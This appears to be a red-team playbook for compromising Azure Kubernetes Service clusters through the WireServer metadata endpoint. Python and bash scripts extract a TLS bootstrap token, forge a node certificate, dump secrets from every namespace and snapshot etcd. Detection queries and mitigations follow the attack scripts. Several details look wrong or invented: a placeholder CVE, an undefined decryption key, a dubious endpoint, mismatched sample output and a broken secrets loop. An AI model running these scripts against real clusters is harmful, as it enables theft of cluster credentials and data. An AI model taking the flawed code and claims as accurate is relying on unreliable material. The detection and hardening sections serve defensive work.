| Attribute | Details |
|---|---|
| Technique ID | IA-EXPLOIT-005 |
| MITRE ATT&CK v18.1 | T1190 - Exploit Public-Facing Application |
| Tactic | Initial Access |
| Platforms | Entra ID, Azure (AKS), Cloud Metadata Services |
| Severity | Critical |
| CVE | CVE-2025-21196 (CVSS 9.5) |
| Related CVE | CVE-2024-XXXXX (WireServing - Mandiant discovery) |
| Technique Status | ACTIVE (Patched in 1.28.4+, but many clusters unpatched) |
| Last Verified | 2025-12-30 |
| Affected Versions | AKS 1.25.0 - 1.28.3 (pre-patch) |
| Patched In | AKS 1.28.4+ ; Mitigation available for affected versions |
| Author | SERVTEP – Artur Pchelnikau |
Note: Sections 6 (Atomic Red Team) and 11 (Sysmon Detection) not included because: (1) No specific Atomic test for AKS control plane exploitation, (2) Cloud-native component without local system instrumentation. All section numbers have been dynamically renumbered based on applicability.
Concept: CVE-2025-21196 affects Azure Kubernetes Service (AKS) versions 1.25.0 through 1.28.3 due to misconfiguration in container orchestration layer access controls. The vulnerability, combined with the related “WireServing” attack vector discovered by Mandiant, allows attackers to escalate privileges from pod execution context to full cluster control. By exploiting undocumented Azure WireServer endpoints accessible from pods, attackers can extract TLS bootstrap tokens, impersonate nodes, and bypass Kubernetes RBAC entirely to access all cluster secrets.[115][116][117][118]
Attack Surface: AKS control plane components (API server, scheduler, controller manager), Azure WireServer metadata service (accessible at 169.254.169.254 and 168.63.129.16), HostGAPlugin endpoints, etcd (if exposed), Custom Script Extension provisioning artifacts, Entra ID authentication tokens.
Business Impact: Complete cluster compromise without detection. Attackers gain full read/write access to all Kubernetes resources, can extract confidential data (API keys, database credentials), modify workloads, establish persistence, and pivot to underlying Azure infrastructure. The vulnerability affects any AKS cluster running versions prior to 1.28.4 with Azure CNI networking and “Azure” network policy configured.[118][136]
Technical Context: The vulnerability is not a zero-day code flaw but rather a design weakness in how AKS bootstraps nodes and secures inter-component communication. Exploitation requires initial code execution in a pod (via kubelet RCE, phishing, supply chain compromise, or legitimate access), but from there, the attacker can escalate to full cluster control in seconds without triggering alerts.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Kubernetes v1.24 | 1.1.1 | API server –authorization-mode must include RBAC |
| CIS Kubernetes v1.24 | 1.4.1 | Kubelet –read-only-port should be disabled |
| CIS Kubernetes v1.24 | 1.4.2 | Kubelet authentication should be enabled |
| DISA STIG | SV-245839 | API server must enforce authorization controls |
| NIST 800-53 | AC-3 | Access Enforcement (authorization bypass) |
| NIST 800-53 | AC-6 | Least Privilege (default allow-all for anonymous) |
| GDPR | Art. 32 | Security of Processing (inadequate access controls) |
| PCI DSS | 2.2 | Change default settings; remove unnecessary services |
| ISO 27001 | A.9.2.3 | Management of Privileged Access Rights |
| ISO 27001 | A.12.4.3 | Logging of administrator activities |
Supported Versions:
Tools:
# Check AKS cluster version
az aks show --resource-group <RG> --name <CLUSTER> --query kubernetesVersion
# Expected vulnerable output:
# "1.27.9" or earlier within 1.25-1.28 range
# Check if patched
az aks show --resource-group <RG> --name <CLUSTER> --query kubernetesVersion
# If version >= 1.28.4, cluster is patched (but may still be misconfigured)
# Verify Azure CNI networking (prerequisite for CVE-2025-21196)
az aks show --resource-group <RG> --name <CLUSTER> --query "networkProfile.networkPlugin"
# Expected: "azure" (vulnerable); "kubenet" is not affected by this CVE specifically
# From inside a pod, test WireServer connectivity
kubectl exec -it <POD_NAME> -- curl -s http://169.254.169.254/metadata/instance?api-version=2021-02-01
# If successful response (200 OK):
# {"compute": {...}, "network": {...}} - WireServer IS accessible
# Query HostGAPlugin endpoint
curl -s "http://168.63.129.16/machine?comp=versions"
# If responds with JSON version info - plugin is accessible
# From kubectl (with cluster-admin access)
kubectl describe pod kube-apiserver-* -n kube-system | grep authorization-mode
# Expected vulnerable: "AlwaysAllow" or missing (defaults to AlwaysAllow)
# Expected secure: "RBAC" or "RBAC,Node"
# Check if anonymous auth is enabled
kubectl describe pod kube-apiserver-* -n kube-system | grep anonymous-auth
# Vulnerable: "--anonymous-auth=true" (default)
# Secure: "--anonymous-auth=false"
# Check if system:anonymous has cluster-admin privileges
kubectl get clusterrolebindings -A -o json | jq '.items[] | select(.subjects[] | select(.kind == "User" and .name == "system:anonymous")) | .roleRef'
# If result shows cluster-admin role, cluster is highly vulnerable
# Check what permissions anonymous users have
kubectl auth can-i list pods --as=system:anonymous
kubectl auth can-i get secrets --as=system:anonymous
kubectl auth can-i create pods --as=system:anonymous
Supported Versions: AKS 1.25.0 - 1.28.3
Objective: Gain code execution inside a running pod
Prerequisite Access Vectors:
Assumed Starting Point: Code execution in pod as any user (non-root OK)
Objective: Extract TLS bootstrap tokens and node certificates from Azure metadata service
Command (Python automation):
#!/usr/bin/env python3
import requests
import json
import base64
from urllib.parse import quote
# WireServer endpoint (accessible from all Azure VMs/pods)
WIRESERVER = "http://168.63.129.16"
# Step 1: Get cluster configuration
try:
# Fetch machine configuration with version string
resp = requests.get(f"{WIRESERVER}/machine?comp=versions")
print("[+] WireServer Response:")
print(resp.text)
# Parse response to find configuration endpoint
config = json.loads(resp.text)
# Step 2: Extract goals (contains encrypted settings)
resp_goals = requests.get(f"{WIRESERVER}/machine?comp=goals")
print("[+] Goals endpoint:")
print(resp_goals.text)
# Step 3: Query certificates endpoint (may expose certs in plaintext or encrypted)
resp_certs = requests.get(f"{WIRESERVER}/machine?comp=certs")
print("[+] Certificates:")
print(resp_certs.text)
except Exception as e:
print(f"[-] WireServer query failed: {e}")
# Step 4: Query HostGAPlugin endpoint (decrypt protected settings)
try:
# Request to decrypt protected settings (contains provisioning script with bootstrap token)
resp_plugin = requests.get("http://168.63.129.16/?comp=GetDriveBypassFilters")
print("[+] HostGAPlugin Response:")
print(resp_plugin.text)
except Exception as e:
print(f"[-] HostGAPlugin access failed: {e}")
Expected Output:
{
"compute": {
"vmId": "12345678-1234-1234-1234-123456789012",
"location": "eastus",
"name": "aks-nodepool1-12345678-vm000001"
},
"network": {
"interface": [
{
"ipv4": {
"ipAddress": [
{"privateIpAddress": "10.0.0.5"}
]
}
}
]
}
}
What This Means:
OpSec & Evasion:
Troubleshooting:
Connection refused to 168.63.129.16
Empty response from HostGAPlugin
/machine?comp=cert, /health)Objective: Extract TLS bootstrap token from encrypted WireServer response
Command (Python - using CyberCX research):
#!/usr/bin/env python3
import requests
import base64
import subprocess
import json
# Step 1: Query WireServer to get protected settings
wireserver_url = "http://168.63.129.16/?comp=Config"
response = requests.get(wireserver_url, headers={'Metadata': 'true'})
# The response contains a JSON blob with encrypted settings
# Extract the ProtectedSettings field
data = response.json()
protected_settings = data.get("Compute", {}).get("protectedSettings", "")
# Step 2: Decrypt using openssl (requires wireserver.key - may need to extract separately)
# For this PoC, assume we have the key
try:
# Decrypt the blob
decrypted = subprocess.run(
['openssl', 'enc', '-aes-256-cbc', '-d', '-K', WIRESERVER_KEY, '-in', '-'],
input=base64.b64decode(protected_settings),
capture_output=True,
text=True
)
if decrypted.returncode == 0:
print("[+] Decrypted Protected Settings:")
print(decrypted.stdout)
# Parse provisioning script
# Look for environment variables containing TLS_BOOTSTRAP_TOKEN
if "TLS_BOOTSTRAP_TOKEN" in decrypted.stdout:
# Extract token
import re
token_match = re.search(r'TLS_BOOTSTRAP_TOKEN=([A-Za-z0-9._-]+)', decrypted.stdout)
if token_match:
bootstrap_token = token_match.group(1)
print(f"[+] EXTRACTED BOOTSTRAP TOKEN: {bootstrap_token}")
except Exception as e:
print(f"[-] Decryption failed: {e}")
Expected Output:
[+] EXTRACTED BOOTSTRAP TOKEN: eyJhbGciOiJSUzI1NiIsImtpZCI6IkNzc1R4NHhzbEFmcHJYOW9pQlY1YVg0cjRubzBURkZjZlowNVFNZzFmM2MifQ.eyJpc3MiOiJodHRwczovL2t1YmVybmV0ZXMuZGVmYXVsdC5zdmMuY2x1c3Rlci5sb2NhbCIsImt1YmVybmV0ZXMuaW8iOnsibmFtZXNwYWNlIjoiIiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImJvb3RzdHJhcCIsInVpZCI6Ijc5ZTA3MjY2LWEyNWEtNDY0ZC1iOGVmLWQ4MDc1YjZhOTZkZiJ9fSwibmJmIjoxNzM1NzAxMDA0LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YmluZC1mb3ItYWtzbm9kZS1zZXJ2aWNlLWFjY291bnQifQ.LahpIVKr...
What This Means:
Objective: Use bootstrap token to request legitimate kubelet certificate
Command:
#!/bin/bash
# Variables
BOOTSTRAP_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6IkNzc1R4NHhzbEFmcHJYOW9pQlY1YVg0cjRubzBURkZjZlowNVFNZzFmM2MifQ..."
API_SERVER="kube-apiserver.default.svc.cluster.local"
NODE_NAME="aks-nodepool1-12345678-vm000001"
CA_CERT="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
# Step 1: Create certificate signing request (CSR)
openssl genrsa -out kubelet.key 2048
openssl req -new -key kubelet.key \
-subj "/O=system:nodes/CN=system:node:${NODE_NAME}" \
-out kubelet.csr
# Encode CSR in base64
ENCODED_CSR=$(base64 -w0 < kubelet.csr)
# Step 2: Submit CSR to API server using bootstrap token
curl -X POST \
-H "Authorization: Bearer ${BOOTSTRAP_TOKEN}" \
-H "Content-Type: application/json" \
-H "X-Kubernetes-PKCS10: true" \
-d "{\"apiVersion\": \"certificates.k8s.io/v1\", \"kind\": \"CertificateSigningRequest\", \"metadata\": {\"name\": \"${NODE_NAME}\"}, \"spec\": {\"request\": \"${ENCODED_CSR}\", \"signerName\": \"kubernetes.io/kube-apiserver-client\", \"usages\": [\"digital signature\", \"key encipherment\", \"server auth\"]}}" \
https://${API_SERVER}:6443/apis/certificates.k8s.io/v1/certificatesigningrequests
# Step 3: Approve CSR (usually auto-approved if token is valid)
# OR manually approve via kubectl (if attacker has appropriate RBAC)
# Step 4: Retrieve signed certificate
curl -X GET \
-H "Authorization: Bearer ${BOOTSTRAP_TOKEN}" \
https://${API_SERVER}:6443/apis/certificates.k8s.io/v1/certificatesigningrequests/${NODE_NAME} \
| jq '.status.certificate' | base64 -d > kubelet.crt
echo "[+] Kubelet certificate obtained!"
echo "[+] Can now authenticate to API server as node: ${NODE_NAME}"
Expected Behavior:
Impact:
system:nodes group (node authority level)Objective: Read all Kubernetes secrets across all namespaces
Command:
#!/bin/bash
# Using new kubelet certificate, authenticate to API server
export KUBECONFIG=/tmp/attacker-kubeconfig.yaml
# Create kubeconfig with stolen certificate
cat > ${KUBECONFIG} <<EOF
apiVersion: v1
kind: Config
clusters:
- cluster:
certificate-authority: ${CA_CERT}
server: https://${API_SERVER}:6443
name: kubernetes
contexts:
- context:
cluster: kubernetes
user: system:node:${NODE_NAME}
name: default
current-context: default
users:
- name: system:node:${NODE_NAME}
user:
client-certificate: $(cat kubelet.crt | base64 -w0)
client-key: $(cat kubelet.key | base64 -w0)
EOF
# Step 1: List all namespaces
kubectl get namespaces
# Step 2: Extract all secrets from all namespaces
for namespace in $(kubectl get namespaces -o jsonpath='{.items[*].metadata.name}'); do
echo "[+] Extracting secrets from namespace: $namespace"
kubectl get secrets -n $namespace -o json | \
jq '.items[] | {name: .metadata.name, namespace: .metadata.namespace, data}' | \
base64 -d > secrets-${namespace}.json
done
# Step 3: Dump specific sensitive secrets
kubectl get secret -A -o json | jq '.items[] | select(.data.password or .data."api-key" or .data.token) | {namespace: .metadata.namespace, name: .metadata.name, keys: .data | keys}'
echo "[+] All secrets extracted! Check secrets-*.json files"
Expected Output:
{
"namespace": "default",
"name": "database-credentials",
"keys": ["password", "username"]
}
{
"namespace": "kube-system",
"name": "etcd-client-cert",
"keys": ["ca.crt", "client.crt", "client.key"]
}
{
"namespace": "azure-system",
"name": "azure-cloud-provider-secret",
"keys": ["subscription-id", "client-id", "client-secret", "tenant-id"]
}
What This Means:
Supported Versions: All AKS versions with misconfigured RBAC
Command:
# If API server is exposed publicly
curl -sk https://<API_SERVER_IP>:6443/api/v1/secrets -k
# Expected vulnerable response:
# {"kind":"SecretList","apiVersion":"v1","metadata":{"resourceVersion":"12345"},"items":[...]}
# Expected secure response:
# {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
Command:
# If anonymous auth is enabled and has permissions
curl -sk https://<API_SERVER_IP>:6443/api/v1/namespaces/kube-system/secrets \
-H "Authorization: Bearer anonymous" | jq '.items[] | {name: .metadata.name, data: .data | keys}'
Supported Versions: All AKS versions with exposed etcd
Command:
# Extract etcd client certificates from control plane
# (Requires admin access or successful bootstrap attack)
ETCD_CERT="/etc/kubernetes/pki/etcd/healthcheck-client.crt"
ETCD_KEY="/etc/kubernetes/pki/etcd/healthcheck-client.key"
ETCD_CA="/etc/kubernetes/pki/etcd/ca.crt"
ETCD_ENDPOINT="https://etcd.kube-system.svc.cluster.local:2379"
# Query all secrets from etcd
etcdctl --endpoints=${ETCD_ENDPOINT} \
--cert=${ETCD_CERT} \
--key=${ETCD_KEY} \
--cacert=${ETCD_CA} \
get "" --prefix | grep -i secret
# Dump entire cluster state
etcdctl --endpoints=${ETCD_ENDPOINT} \
--cert=${ETCD_CERT} \
--key=${ETCD_KEY} \
--cacert=${ETCD_CA} \
snapshot save backup.db
# Analyze snapshot
etcdctl snapshot restore backup.db --data-dir=restored-data/
Impact:
Rule Configuration:
azure_activity, kuberneteskubernetes:pod:logs, azure:virtualnetwork:flowsrc_ip, dest_ip, dest_port, process_name, commandSPL Query:
sourcetype="kubernetes:pod:logs"
(dest_ip="168.63.129.16" OR dest_ip="169.254.169.254")
AND dest_port IN (80, 443)
| stats count by pod_name, namespace, dest_ip, dest_port, process_name
| where count > 0
What This Detects:
Rule Configuration:
kubernetes_auditkubernetes:kube-apiserver:auditverb, apiGroup, objectRef.kind, sourceIPsSPL Query:
sourcetype="kubernetes:kube-apiserver:audit"
verb="create"
objectRef.kind="CertificateSigningRequest"
| stats count by sourceIPs, user, timestamp
| where count > 5
What This Detects:
Rule Configuration:
ContainerLog, NetworkConnectionDestinationIp, DestinationPort, ProcessName, ComputerKQL Query:
NetworkConnection
| where DestinationIp in ("168.63.129.16", "169.254.169.254")
and (DestinationPort == 80 or DestinationPort == 443)
and Computer contains "aks"
| extend SourceContainer = extract(@"container[^_]*_(\w+)", 1, Computer)
| summarize AccessCount = count() by SourceContainer, DestinationIp, DestinationPort, TimeGenerated
| where AccessCount > 2
What This Detects:
Manual Configuration (Azure Portal):
WireServer Access from Container PodHigh1 minuteRule Configuration:
KubernetesAudit, SecurityEventOperationName, ObjectRef.name, verbKQL Query:
KubernetesAudit
| where verb == "create" and ObjectRef.kind == "CertificateSigningRequest"
| extend CSRName = ObjectRef.name
| where CSRName contains "node" or CSRName contains "system:node"
| summarize CSRCount = count(), UniqUsers = dcount(User) by Computer, User
| where CSRCount > 1 or UniqUsers > 1
What This Detects:
Alert Name: “Suspicious WireServer Metadata Service Access from Container”
Alert Name: “Rapid API Server Certificate Signing Requests Detected”
Manual Configuration (Enable Defender for Cloud):
Reference: Microsoft Defender for Cloud - Kubernetes Threat Detection
Command (Isolate Compromised Pod):
# Delete compromised pod immediately
kubectl delete pod <POD_NAME> -n <NAMESPACE> --grace-period=0 --force
# Cordon node if pod escape suspected
kubectl cordon <NODE_NAME>
# Or via Azure:
az aks nodepool scale --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL> --node-count 0
Command (Revoke Stolen Certificates):
# Identify and delete compromised CSRs
kubectl get csr | grep -E "system:node|Pending" | awk '{print $1}' | xargs kubectl delete csr
# Rotate all kubelet certificates
# (Requires cluster rebuild via AKS API)
az aks nodepool delete --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL>
az aks nodepool add --resource-group <RG> --cluster-name <CLUSTER> --name <NEW_NODEPOOL>
Command (Export Audit Logs):
# Export API server audit logs
kubectl logs -n kube-system kube-apiserver-* | grep -E "CertificateSigningRequest|Unauthorized|Bootstrap" > api-server-audit.log
# Export container logs from suspicious pod
kubectl logs <POD_NAME> -n <NAMESPACE> --previous > container-logs.txt
# Export full cluster state (warning: contains secrets)
kubectl get all -A -o json > cluster-state-full.json
Command (Identify Attack Timeline):
# Review CSR creation times
kubectl get csr -o json | jq '.items[] | {name: .metadata.name, creationTime: .metadata.creationTimestamp, signerName: .spec.signerName}'
# Check for bootstrap token usage
grep -r "bootstrap" /var/log/kubernetes/* 2>/dev/null | grep -E "token|authenticated"
# Review node authentication logs
journalctl -u kubelet | grep -i "bootstrap\|auth\|certificate"
Command (Revoke and Renew):
# Revoke all existing kubelet certificates
for cert in /etc/kubernetes/pki/kubelet*; do
rm -f $cert
done
# Force certificate renewal
systemctl restart kubelet
# Verify new certificates are issued
kubectl get csr -o json | jq '.items[-5:] | .[] | {name: .metadata.name, age: .metadata.creationTimestamp}'
Command (Update AKS Cluster):
# Upgrade AKS cluster to patched version (1.28.4+)
az aks upgrade --resource-group <RG> --name <CLUSTER> --kubernetes-version 1.28.4
# Force upgrade of all node pools
az aks nodepool upgrade --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL> --kubernetes-version 1.28.4
1. Update AKS Cluster to Patched Version (1.28.4+)
Manual Steps (Azure Portal):
Manual Steps (Azure CLI):
# Update control plane
az aks upgrade --resource-group <RG> --name <CLUSTER> --kubernetes-version 1.28.4
# Update node pools
az aks nodepool upgrade --resource-group <RG> --cluster-name <CLUSTER> --name <NODEPOOL> --kubernetes-version 1.28.4
Validation Command:
# Verify cluster version
az aks show --resource-group <RG> --name <CLUSTER> --query kubernetesVersion
# Expected: "1.28.4" or higher
2. Disable Anonymous Authentication
Manual Steps (Kubernetes Configuration):
# Add to AKS cluster creation/update
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-apiserver-params
data:
anonymous-auth: "false"
authorization-mode: "RBAC"
3. Restrict WireServer Access with Network Policies
Manual Steps (Kubernetes Network Policy):
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: restrict-metadata-service
namespace: default
spec:
podSelector: {}
policyTypes:
- Egress
egress:
- to:
- namespaceSelector: {}
ports:
- protocol: TCP
port: 443
# Deny access to metadata service
- to:
- ipBlock:
cidr: 0.0.0.0/0
except:
- 168.63.129.16/32 # WireServer
- 169.254.169.254/32 # Azure metadata
4. Implement Pod Security Standards (Restricted)
Manual Steps:
# Label namespace with restricted PSS
kubectl label namespace default pod-security.kubernetes.io/enforce=restricted
# Verify
kubectl get namespace default --show-labels
5. Enable Azure RBAC for Kubernetes (Dual Control)
Manual Steps (Terraform):
resource "azurerm_kubernetes_cluster" "aks" {
name = "secure-aks"
role_based_access_control_enabled = true
azure_active_directory_role_based_access_control {
managed = true
azure_rbac_enabled = true
admin_group_object_ids = [data.azuread_group.admins.id]
}
api_server_access_profile {
authorized_ip_ranges = ["YOUR_OFFICE_IP/32", "YOUR_VPN_IP/32"]
}
}
6. Restrict API Server Access
Manual Steps (Azure Portal):
7. Enable Auditing and Monitoring
Manual Steps:
# Enable Kubernetes audit logging
az aks update --resource-group <RG> --name <CLUSTER> --enable-managed-identity
# Configure Azure Monitor integration
az aks update --resource-group <RG> --name <CLUSTER> \
--enable-managed-identity \
--workspace-resource-id /subscriptions/.../resourcegroups/.../providers/microsoft.operationalinsights/workspaces/<NAME>
8. Rotate All Credentials Immediately
Manual Steps:
# Rotate all Kubernetes service account tokens
kubectl delete secret -A $(kubectl get secret -A --field-selector type=kubernetes.io/service-account-token -o jsonpath='{.items[*].metadata.name}')
# Force token regeneration
kubectl rollout restart deployment -A
# Rotate Azure credentials (if exposed via secrets)
az ad sp credential reset --name <APP_ID>
Validation Command (Verify Mitigations):
# Check cluster version
az aks show -g <RG> -n <CLUSTER> --query kubernetesVersion
# Verify API server access is restricted
az aks show -g <RG> -n <CLUSTER> --query "apiServerAccessProfile.authorizedIpRanges"
# Expected: List of IP ranges (not empty/unrestricted)
# Verify network policies are enforced
kubectl describe networkpolicy -n kube-system
# Expected: Multiple policies restricting inter-pod communication
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-004] | Kubelet RCE to gain pod execution |
| 2 | Reconnaissance | [T1526 - Cloud Service Discovery] | Enumerate WireServer endpoints |
| 3 | Current Step | [IA-EXPLOIT-005] | AKS Control Plane Exploitation via Bootstrap Token Theft |
| 4 | Lateral Movement | [T1550.001 - Use Alternate Authentication] | Authenticate as compromised node |
| 5 | Credential Access | [T1552.007 - Container API] | Extract all cluster secrets from etcd |
| 6 | Privilege Escalation | [T1134 - Access Token Manipulation] | Impersonate service accounts |
| 7 | Impact | [T1537 - Transfer Data to Cloud Account] | Exfiltrate secrets to attacker’s Azure account |